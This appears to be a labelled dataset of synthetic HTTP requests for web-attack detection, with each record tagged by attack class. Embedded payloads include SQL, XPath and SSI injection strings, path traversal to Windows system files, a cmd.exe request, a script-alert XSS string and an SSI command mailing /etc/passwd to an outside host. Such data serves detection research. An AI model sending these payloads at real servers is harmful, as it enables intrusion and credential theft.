If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: *
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 42
MIME-Version: 3.6
Pragma: a2tot=rebrch
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM bHJkZThpb3djQXJnYWFpYnlCbzRkdHdhbmVsdWNlbzJ3cEluem9ic3FmaGNtaHc=
Range: -01750,762-,10389-0
Referer: http://oHp8td.fr/ynAbeSp.gif
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: yiK4anB5baTiaerl
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: deflate
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 90.180.246.61
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45226
Start - Id: 44759
class: PathTransversal
GET /sa/aZPpvalU5cU/doP/tnrqLtu4uahewzuaeiim/UQlogGruMVeU/sasos5es/rpocatolRu8to6zii/ngbTYF6tNrHZbgj.asp?len=doc%28++++file%3A%2F%2F%2Fc%3A%2FN6ael%2Frtdmnosf.xml+++%29&8DyIgscriptxcopy=ascriptce&HgEeejdeNae=-sps&thhakdnhTegdtht=34899609&b5a=lfUcU HTTP/1.1
Host: 93.91.153.139:536
Connection: iinpnmi
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.6, iso-2022-kr, shift_jis, iso-8859-9
Accept-Encoding: 
Accept-Language: a-etfsej
Cache-Control: no-cache
Client-ip: 245.254.197.131
Cookie: ozoaa=6iH9BoQD;jpv1huee=igx@;ia=fetcifobidivsr+\u
Cookie2: $Version="28"
Date: Fri, 16 Apr 10 01:00:42 GMT
ETag: "HPp6EczO1MttMa0n"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sat, 08 Apr 06 07:12:10 UTC
If-Unmodified-Since: Tue, 07 Feb 06 15:34:58 UTC
If-Match: "cUUktjRxy1eKPf5mhte"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 920
MIME-Version: 1.0
Pragma: nle='o2htewtt'
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 484-6716,4-82,-34
Referer: /1uueovq.wav
TE: chunked;q=0.6,trailers
Trailer: TE
User-Agent: dstd6ayts/8.2.2.0
UA-CPU: Sparc
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: HTTP/9.0 www.repd5thy.shtml, HTTP/1.7 www.bail.jpg, HTTP/2.1 www.eetiee5e.js
Transfer-Encoding: compress
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 707 233.213.218.176:22416 "2pjtanyoNbt" "Mon, 22 Mar 10 21:57:09 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44759
Start - Id: 50105
class: XPathInjection
PUT /cWMw.qMmpVd.aspx? HTTP/1.1
Content-Length: 125
Content-Language: 3wjncztm
Content-Encoding: identity
Content-Location: http://sr3pdt.de/totussmO/c802fvd.pl
Content-MD5: SHBnYXR2RXM3Q0NyeWhlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Jul 09 23:13:00 GMT
Last-Modified: Mon, 23 Jan 06 18:56:55 CET
Host: www.ammimaH.st
Connection: acaex
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.7, big5, windows-1257, hz-gb-2312;q=0.4, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: 0-nsc;q=0.4, Ept0oo-w;q=0.3, limSujh-iIhheile, odUnsseo-defg
Cache-Control: no-transform
Client-ip: 60.34.2.0
Cookie: 2rc=42261    or    1<    tsa/5lcde5/v/child::text()[position()=0] or     614='] | /* | /foo[bar=';qeatlrsn=Af-window.open
Cookie2: $Version="88"
Date: Fri, 13 May 05 06:42:47 CET
ETag: "Th2@JpEFYgjSqgM"
From: owoaubhg@aSsrtajt.cz
If-Modified-Since: Sat, 18 Dec 04 13:00:45 GMT
If-Unmodified-Since: Sat, 11 Feb 06 04:57:48 UTC
If-Match: "@81aKsFrAT7ZDDXk_e"
If-None-Match: "Tmq_bkGS5GuEOqrhVGFE"
If-Range: *
Max-Forwards: 17
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic c2ppdHBkOmRuZWpuc2M=
Authorization: Basic ZW9iaXIyaHQ6ZzFtZGs5YQ==
Range: 421358-283
Referer: /ieansn/rtNoR7o.png
TE: gzip,chunked;q=0.8,trailers
Trailer: Accept
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 6.5; Es-tm; rv:7.3.3) Gecko/58864219
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1334x3264
Via: ei8i67/9.1 www.nvTn.png:5919, 4.8 29.127.124.251, 6.2 www.5eht1y.shtml
Transfer-Encoding: iBtnA; srhao6yC=ros4iwq
Upgrade: nnMyet/2.6, nrE/8.0, uath/4.7
X-Forwarded-For: 12.248.6.194
----: ------------

Yo@_ln=aUN&2ntyimeft=c_mT&8eEiet6stnny=&k&B@8falNwinntQd=76&ifetU=r&wsdhsgl4ts4nh=e2Wdq9&QZL32ftpkeS=wgQ@zL&otots8=rtiies

End - Id: 50105
Start - Id: 35465
class: SqlInjection
POST /nlr9mHt/6R2iPwBHX1zcJ-N08K4Z/nptKF/jcgHUH4UHEM-/jlYN2rQ._K_/5aeecaim/xCgWBF8-C_l8xOA/qzaccess_logzY2ZlikeVK/waothlnicoqtevr/cfz.gif? HTTP/1.0
Content-Length: 207
Content-Language: sraedi,OrtO
Content-Encoding: compress
Content-Location: http://www.dhiM.net/tnHi4vae/ulqm.jsp
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 20 Nov 08 05:23:50 GMT
Host: 203.32.54.233
Connection: close
Accept: image/*;q=0.2, video/*;q=0.1
Accept-Charset: utf-7;q=0.6, iso-8859-8-i;q=0.4
Accept-Encoding: deflate;q=0.8, gzip, compress;q=0.9, compress
Accept-Language: o2oA-dgod8, wbhdh-honiOumy;q=0.7, 9sths62-tEIsshha;q=0.3
Cache-Control: no-cache
Cookie: bhmeAdtszdr=lrlebrsrOr2oIt;hb2eiednofk=dt7tnsl1autoexec;iremhdqapjb=OR 'o5'   = 'Sim'+'ple';lm=hedeleteexp_likeo s8EimsprohT;inie=1
Date: Wed, 06 Oct 04 21:22:15 CET
Expect: 100-continue
If-None-Match: *
If-Range: Fri, 08 Jul 05 09:13:59 GMT
Max-Forwards: 0
Authorization: Digest nonce
Referer: http://www.cottf8.uk/ber1wdly.shtml
TE: trailers,deflate
User-Agent: t.Tv69V http://www.7asnz.biz

8rd7=d19chgk-kPbY&Oe8dkAlnde=e:2&aoiisgy9o4oD=adminN91where1p9sii7f&Gt=d n)ht&u0ovueC1e=549203&nuxg=7oeaemhqa2 ao&o07xal=l@rznGE&e6ht=30134&ctenoyki=esock_stream4oew&tvGtuaa=[3wt&tSlhOa5i3mdeC=e1aEqe

End - Id: 35465
Start - Id: 36194
class: PathTransversal
PUT /locationwJa@formX1ND/sNYPkiaVehNGw0pZX-/elV0zqb/QdIiframemp0QDV/vw04M_6bodyrcpaZ/ondUZ9As..jpg? HTTP/1.0
Content-Length: 23
Content-Language: Oulna,o
Content-Encoding: identity
Content-Location: http://www.st8a.gov/1oeeeRh/eprtde.jpg
Content-MD5: b255dWFsZXRvcHI4ZWxJdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jan 04 05:41:27 UTC
Host: www.3uscsig.it
Connection: deye
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity
Accept-Language: 0s5-8fb5;q=0.3, vsu-sn5ag, c-g, aetTtd-tococuh;q=0.1, 8tD-b;q=0.4
Cache-Control: max-stale=5
Client-ip: 179.44.14.163
Cookie: taEore=..\..\..\..\..\..\WINDOWS\system.ini;rgA4ecoovtptlt=22261121;ueetcktlyA=Daei;acan8d=aeadeAr4x~pts|bnph-w ;wcu=nrlthee1nnRswzteet
Cookie2: $Version="355"
Date: Fri, 14 Nov 08 04:51:00 GMT
Expect: 100-continue
From: anzor8q@srmi.net
If-Unmodified-Since: Fri, 05 Mar 10 15:23:04 CET
If-Match: "WKz1WkyI5lMobWcC37"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.6
Pragma: Q='aihNki'
Authorization: Digest qop=auth-int
Referer: /tebo.dll
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 2.0; ds-tT; rv:4.8.4) Gecko/77395290
UA-Disp: 6799,4667,8
Via: 0.8 30.122.222.68, 7.0 www.pg9Nr.js, 7.5 www.areeeNr.js
Transfer-Encoding: compress

lsncipareaottde=8982320

End - Id: 36194
Start - Id: 48578
class: XPathInjection
PUT /oENiAPWm50LD8/nwnWe8r4oqfTohe2/deopzTipecce4/tV3ORBf/irlpuom/cXNVuswp-8/nZBf6VpaMgod/bnen1of9anyaiva/mllleeueehr9ra5taz/gul.pD2QwqIwP.php3? HTTP/1.1
Content-Length: 242
Content-Language: mueror,tirld
Content-Encoding: compress
Content-Location: /lned0.png
Content-MD5: ZVVwdWhyc25vbHNsYWVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 08:23:05 UTC
Last-Modified: Mon, 12 May 08 13:24:56 CET
Host: 253.27.203.97
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: rgie2-ogsthr, nu2ltw9e-0awaln;q=0.6, o-t;q=0.0, dgvt-ore1;q=0.1, aS-Ah;q=0.9
Cache-Control: max-stale
Client-ip: 166.0.104.233
Cookie: tdhsn=372;Gswp-uxI=ecopy%where;gy1UXbqDkhavingaU=4
Cookie2: $Version="91"
Date: Sat, 16 Oct 04 01:52:13 UTC
ETag: W/"9_noTccKOGCA-qy"
Expect: iJvsn=ronjlII
From: Wdtimv@enchEetli.fr
If-Modified-Since: Wed, 26 Jul 06 02:05:21 CET
If-Unmodified-Since: Tue, 29 Aug 06 23:27:33 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: Thu, 16 Oct 08 24:50:23 CET
Max-Forwards: 8566
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic ZnJ5ZXRpOmh0c2Jkcnc2
Authorization: Digest qop=auth-int
Range: 89-706195
Referer: /0ohls/4d0ea/5Srmra/ecntbh/hneOmnpa.cgi
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: Mozilla/7.8 (X11; U; Linux i586 7.2; oe-ed; rv:7.9.9) Gecko/32664138
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: identity
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 315 www.ao85sn.css "tafdeoll9t" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Tsce8in2buonie=(i < count(dE/child::text()) and  j   <   count(osXe/child::comment()) and    k     < count(ied/child::*)  )&wrnahrwh=9tXn0Zz8QT&mysddRtnfaakcv=786&ninwimgservicesO0aTM=0663118097

End - Id: 48578
Start - Id: 41646
class: SqlInjection
GET /Zih/sl.jpg?itua=4490167&GjphavingqIN=2138&5o9rEsMei=ophRotcrliEge0t&eTtkp=nqsNbZ&R67LxKqcopy=QSi%5DrsoCNte1s&Us.Eou=7&desyiegqun=%27%3B+++insert++into+Lbflht++++values%28666%2C%274Qnahorv%27%2C%278noo%27%2C0xfffff%29&mKkom=0199928&eyenmeae=7 HTTP/1.1
Host: 106.188.191.209:80
Connection: close
Accept: image/*, application/rtf;q=0.1
Accept-Charset: x-mac-greek, x-mac-cyrillic, x-mac-chinesesimp;q=0.6, euc-kr
Accept-Encoding: deflate;q=0.2, identity, gzip;q=0.0
Accept-Language: eszeUn-Txomasws;q=0.9, yiyte5n-93ctm;q=0.5, amideae-stvu, eRoEneez-ieahnn9;q=0.8, 5ehcrl-uzji5lS
Cache-Control: only-if-cached
Client-ip: 254.173.30.240
Cookie: D488=90697375;1wu2=13
Cookie2: $Version="52"
Date: Sun, 06 Jun 04 19:48:16 UTC
ETag: W/"r_QJrhsuVl-TmF.YVYtB"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: *
If-Range: Fri, 27 May 05 11:30:42 GMT
Max-Forwards: 3
MIME-Version: 7.4
Pragma: 3mec='e'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: http://www.3oKg.gov/rdjdisd/nxdussz/ilieax.jpg
TE: chunked;q=0.5,gzip,trailers
Trailer: Range
User-Agent: hwpexne2suGU
UA-CPU: MIPS
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1153x567
Via: HTTP/4.0 www.eaotb7h.html, 9.3 216.82.44.81, FTP/0.2 211.125.91.162
Transfer-Encoding: 1yod
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41646
Start - Id: 45419
class: PathTransversal
POST /i7EbMLk9yzeAgvbZ@/rj9YEV6oV999mDYTEv/qsk/ytimsnpI1Ohrnh/hNc1etlole3ppanOd/3M-skb87sH@KtEIUk/tnQJlLmHLq@p/a8mo.html? HTTP/1.0
Content-Length: 308
Content-Language: eep,6o,o5eaD
Content-Encoding: gzip
Content-Location: http://ntEiE0.gov/eneBrae/3tar.exe
Content-MD5: bjNycnRhbFpjY2xuZWVJMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jun 06 18:25:03 CET
Last-Modified: Thu, 16 Nov 06 10:34:34 UTC
Host: www.sdilasn5v.com
Connection: close
Accept: audio/basic;q=0.4, audio/x-wav;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="2"
Date: Mon, 24 Dec 07 10:49:11 GMT
ETag: W/"YIv7-YIQ3UOzG@Xq"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 11 Jun 09 10:06:56 CET
If-Unmodified-Since: Sun, 11 Oct 09 24:38:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 May 06 16:31:04 GMT
Max-Forwards: 9
MIME-Version: 4.3
Pragma: lk='aog'
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic Ym1laWhlYTppbjZ0cnM=
Range: -292636,082693-
Referer: http://www.m8fte.biz/EnarI/poj5cn/1lfh7v/ynecyWf/uehJt.css
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: rewQGDk0f http://www.o2oon2i.cz
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: 3.8 202.169.70.21, erin/9.9 www.trdir.png
Transfer-Encoding: identity
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

roucel=Tmjbtamee6ime&Ds7h8n=7726693&9j-Sm4H=eoaE&artqeehhal2ha=qd p&phebnrdbggiatna= y4-sirhttp'gte &ocgpAaskwew60e=3167256&uod5shrhs0=63919199&YBoptt=c_nK9zy&tdonib=../../../../../../WINDOWS/autoexec.bat&ye=nIh8&ephehees0urd=m&dn1o2=oenHbTmrfi&tNoYtutTcnalra6=wh0n&anamnloi=smochaweE-t5a?o

End - Id: 45419
Start - Id: 40135
class: SSI
GET /hczVqj@h1J.BGGXAk/WaW/zmmdu-Zr/s8Wn.Y/arr7rfao6smPtfaev/aroaclhnh1aeb/atedNltcbitojxn/tCOtiA5dsd4dcrrte/i@qD7tMvtGh8.js?C3y_Y6=tUiez+libtg9t3%29&x5au.Mprocessing-instructionU=198&ibi=0322509780&o8hoirvhasitOL=%3BaeabuyuhateninUscriptc&o8Bm=4&uey=oneaa&ihdtsasMErdac=dk%40mta%29doBeaS3s&endeieiej=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fmail++eqcyexcz.com++%3C+++++%2Fetc%2Fpasswd%22--%3E HTTP/1.0
Host: www.jni949tiit.com
Connection: vdifh
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=574
Client-ip: 246.182.239.2
Cookie: pssrusateU4=yirvbscripts;Meeobat=;p;6JaWexecMRpasswdsystempassthru=olibn;7EnkoLSeto=114522;bXF3xp_=ecmdm4ec'so;bamk3=45
Cookie2: $Version="8"
Date: Thu, 22 Jun 06 20:36:13 UTC
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: PtrtE@h2sisrnd.gov
If-Modified-Since: Tue, 02 Nov 04 16:29:49 CET
If-Unmodified-Since: Mon, 08 Aug 05 07:18:48 UTC
If-Match: *
If-None-Match: "epZvrM3VuYc5TvvgPQQC"
If-Range: "peaBNeIxgmeh631w"
Max-Forwards: 63
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: Basic dXRzdDp0cndvcmdmYQ==
Range: 86-29827,480182-539278,773981-8539
Referer: http://www.rrslp9rA.biz/eTeeriz/sSAey/Shrcymie/ten6xi2r.php
TE: chunked;q=0.7,chunked;q=0.4,trailers
User-Agent: rIhebgTtw4aa
UA-Disp: 5908,939,32
UA-Color: color32
UA-Pixels: 844x123
Transfer-Encoding: identity
Warning: 529 181.61.46.190 "ahfaa4issh1dihO" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40135
Start - Id: 45640
class: PathTransversal
GET /tdstHPF/OexecYdSKsamautoexec4p/w1hA1/wocbomi8ic/Kd3Rr_hLsXF/dIAbFbihEp/tir8AEuX/RIy@0ctelnetjU7/blgSyt9nntuarr5n/efj4Tu6b088i/8c@_j/sLHggpWUwGn3F.mdb?Sds=rUkwcnbinyli4cdn&t0rgrtcaa5auaN=21&rwsoeaz=hehededeaatndr3om+it&jhaoI7Dedy=areplacee%7Eiiet0sor%26n%2F&oN=6197558&ye=e0Ai&t4dTl=djbheoaffpm&2oS42=%5CT+nS&Nth2yfdodTliS=g%27ilibohosr1%28ocA%3Dobjectt&NEi0y29YpXG=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Forchilis%2Fli%2Fragengenie%2Fchitic.nsf&cmwohsemUdS=staesniithi%25f&uRnwimnD9o=w5e%402ezesiefrom%3Atesock_streamg%3C+&slRp2e78btEfo=setlf6eT4yognrfaer HTTP/1.0
Host: www.ahaismrw.uk
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-arabic;q=0.4, hz-gb-2312;q=0.8, x-mac-hebrew, iso-8859-4;q=0.9
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 119.119.95.17
Cookie: TwsdO3alEe=t3texp_;eOi0joo=f iai7IEhss;toagangOahosti=cnetcatbgsoundj;ujsatenrf=u2-MrPY
Cookie2: $Version="56"
Date: Sat, 20 May 06 02:34:21 CET
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Wed, 02 Nov 05 13:59:52 GMT
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: *
If-Range: Fri, 26 Dec 08 15:47:27 GMT
Max-Forwards: 9298
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: ainqa 6ycv=LWatao
Range: -5753
Referer: http://www.inaeh5.ch/3eajoSn/3oenaog/rtooAav/eeogxres/nneves9t.shtml
TE: trailers,deflate;q=0.1,trailers
Trailer: Upgrade
User-Agent: tadRP0 http://www.Aoeno.st
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/6.7 www.4sxoa.css, 9.1 www.tuWisdaA.png, HTTP/0.9 49.116.87.225
Transfer-Encoding: compress
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45640
Start - Id: 44157
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: 202.16.232.135
Connection: keep-alive
Accept: image/gif;q=0.3, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: oezt='urths'
Client-ip: 165.243.248.164
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="971"
Date: Fri, 21 Dec 07 07:15:27 GMT
ETag: "fs5xbNlo-GIu_ej"
Expect: wzoajpob=ltbiem;tOrhtt7
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Thu, 18 Jun 09 16:02:43 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 0
MIME-Version: 7.5
Pragma: Hnen=zreocno
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Digest realm
Range: 815-,644-20793
Referer: http://t4tn.be/orxao/Er0eto5.txt
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.6 (X11; U; SunOS sun4u 4.4; ta-9d; rv:2.9.9) Gecko/83543796
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: HTTP/0.5 www.eAasnca.jpeg, 7.6 www.eoea.css, 9.6 www.oxryd.gif
Transfer-Encoding: hdsaei
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 315 250.26.253.55 "aaeakdwosbfa" "Wed, 07 Apr 10 16:10:50 GMT"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 008751
----: -------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44157
Start - Id: 44291
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.nTez2wzDe.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: 3T-ff6riml4, ogEr4-lOwyx;q=0.6, lkt-7tda;q=0.4, l0ts-tre, s-3rs
Cache-Control: no-cache
Client-ip: 171.2.10.60
Cookie: psc=tm;lunionWkAVku7.=668483
Cookie2: $Version="0"
Date: Sat, 02 Jan 10 18:03:34 CET
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Fri, 06 Mar 09 01:02:20 UTC
If-Unmodified-Since: Fri, 15 Oct 04 22:01:25 UTC
If-Match: *
If-None-Match: *
If-Range: "iROizBQS@Y28_D1aeg9"
Max-Forwards: 5
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 77-00,194-
Referer: http://www.n9ifm.cz/ryrotD/tasf/dnts.swf
TE: chunked,chunked,gzip;q=0.6
Trailer: If-Match
User-Agent: Mozilla/5.4 (Windows; U; WinNT 4.3; gt-sa; rv:9.1.0) Gecko/97338251
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0573x2598
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: Oserkm; tohe=lu8n
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 11968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44291
Start - Id: 46525
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: 150.146.194.224
Connection: close
Accept: image/gif;q=0.5, audio/*;q=0.4, audio/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: aaapseu-mjgs, 8ualnusw-Eaea;q=0.0, 2l-ymh;q=0.1
Cache-Control: no-transform
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="5"
Date: Sat, 10 Dec 05 17:17:57 UTC
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Mon, 24 Oct 05 14:44:18 GMT
If-Unmodified-Since: Thu, 11 Aug 05 14:03:30 GMT
If-Match: "wa6B8W4dHwr_V0Uo.1if"
If-None-Match: "C0265eK76TMkHFOOvS"
If-Range: "39BfhVaP4oOWHRYG@"
Max-Forwards: 87
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: http://www.emgncad.ch/ycom0/saeSs/sxirr.tar
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: slomdracdera
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/2.6 www.nRlS.tiff
Transfer-Encoding: compress
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46525
Start - Id: 39854
class: SSI
PUT /eka/A1aaAW3zthpdsi.cfm? HTTP/1.1
Content-Length: 36
Content-Language: tarses,nge9bAa,tmag
Content-Encoding: gzip
Content-Location: http://www.Jefht.ch/nEfSnj/attto/gbtfwan/eoanoe4t.php4
Content-MD5: YmtvaWRNc2hCbG9pdGNjNA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 06 Apr 08 10:54:29 UTC
Host: www.ltsxbhay.net
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-korean;q=0.0, us-ascii;q=0.2, ks_c_5601-1987;q=0.7, cp-936;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 118.124.213.233
Cookie: dsibluic=ps~p;ee3hetaha=7739291;b5da9tydne=8shd9e8ae;2Ww2EVeQx.P=<!--  #include    virtual="/var/log/httpd/access.log"  -->;2sTWmtQe43=atEtgheewmlraotty
Date: Wed, 24 Sep 08 05:16:10 CET
Expect: t0ar3eB
From: tvfxesoi@dneeTei.fr
If-Modified-Since: Sat, 16 Sep 06 08:57:07 GMT
If-Unmodified-Since: Sun, 13 Apr 08 14:17:07 CET
If-Match: *
If-None-Match: "nu61-Y5@@jVtm35_K"
If-Range: *
Max-Forwards: 8611
Pragma: no-cache
Authorization: yCb0ar doniat6=TrHFt
Range: 0-,695-,-19
Referer: http://8fcegeti.net/viesoely/hrd0ole.mspx
TE: deflate;q=0.5,gzip,chunked
User-Agent: Mozilla/8.1 (Windows; U; WinNT 2.8; w2-oh; rv:6.5.3) Gecko/68710538
UA-CPU: StrongARM
UA-Pixels: 376x9045
Via: 7.6 185.241.102.84, HTTP/2.4 www.ncrZ.shtml, FTP/6.9 46.243.192.242
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~

tnnl6nltne9hg=eesfa&hfnto=nseswneyqh

End - Id: 39854
Start - Id: 42782
class: SqlInjection
